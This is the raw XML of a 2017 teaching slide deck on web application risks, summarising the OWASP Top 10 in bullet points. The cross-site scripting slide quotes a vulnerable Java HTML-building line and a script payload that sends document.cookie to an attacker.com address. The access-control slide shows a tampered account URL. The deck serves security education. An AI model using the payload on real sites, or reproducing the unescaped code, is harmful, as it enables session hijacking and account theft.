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005B-307D-47D8-A012-84DE559E582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1DFC-0782-45D6-B09D-CE0919F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app/accountInfo?acct=notmyac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Based Application Risks and Threats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A7 – A10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Dives into protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A7 – Insufficient Attack Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A8 – Cross-Site Request Forgery – while this isn’t protection, it acts the same way as XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A9 – Using Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A10 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Underprotected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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2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web based application threats and risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Explain the OWASP Top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5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OWASP – Open Web Application Security Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Started in 2001 and officially 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Designed to education about secure software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Top 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Represents the top 10 most critical risks to web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Released every few years to help developers and the community pay attention to risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Latest Top 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2013 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2017 – to be released in July or August of 2017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7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A1 -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Injection flaws have been at the top of the list for years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Covers: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XXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LDAP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker sends untrusted data to a system that interprets the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker can do almost anything depending on what software is running for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10679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 – Broken Authentication and Session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sessions can be hijacked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Information that can be stolen or accessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usernames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Account information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Poor authentication coding methods allow attackers to gain access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155911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 – Cross-Site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wide spread issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be either executed on the server or client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can also be stored or reflected attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers execute scripts via a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>' type='TEXT' value='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("CC") + "'&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The attacker modifies the ‘CC’ parameter in his browser to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> '&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='http://www.attacker.com/cgi-bin/cookie.cgi? foo='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current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 – Broken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use insufficient security measures to bypass authentication mechanisms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http://example.com/app/accountInfo?acct=notmyacct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Change in parameter values allow access </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322736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A5 – Security Misconfiguration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misconfiguration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9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A6 – Sensitive Data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this is just data exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can happen a number of different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most breaches occur because someone did not encrypt the data properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used in conjunction with other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8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Based Application Risks and Threats</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>OWASP Top 10</vt:lpstr>
      <vt:lpstr>A1 - Injection</vt:lpstr>
      <vt:lpstr>A2 – Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>A3 – Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>A4 – Broken Access Control</vt:lpstr>
      <vt:lpstr>A5 – Security Misconfiguration</vt:lpstr>
      <vt:lpstr>A6 – Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>A7 – A10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Application Risks and Threats</dc:title>
  <dc:creator>Greg Williams</dc:creator>
  <cp:lastModifiedBy>Greg Williams</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-04T20:31:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-04T21:00:49Z</dcterms:modified>
</cp:coreProperties>
</file>